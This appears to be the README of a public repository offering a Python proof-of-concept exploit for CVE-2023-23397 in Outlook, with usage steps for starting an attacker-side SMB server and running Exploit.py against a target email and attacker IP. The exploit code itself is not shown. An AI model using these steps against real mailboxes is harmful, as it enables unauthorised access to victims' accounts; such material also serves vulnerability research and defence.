/CVE-2023-23397

Proof of Concept for CVE-2023-23397 in Python

Primary LanguagePythonGNU General Public License v3.0GPL-3.0

CVE-2023-23397 (Outlook Privilege Escalation)

Proof of Concept for CVE-2023-23397 in Python

Quick and easy "proof of concept" in Python for the Outlook CVE that affects Microsoft Office/365 products.

Usage

  1. Install pywin by running pip install pywin32
  2. Start a SMB server on the attacker machine, such as Metasploit's SMB module
  3. Run python Exploit.py <save_or_send> <target email> <attacker_ip> passing the command (save or send), the target email address and the IP of the attacker's machine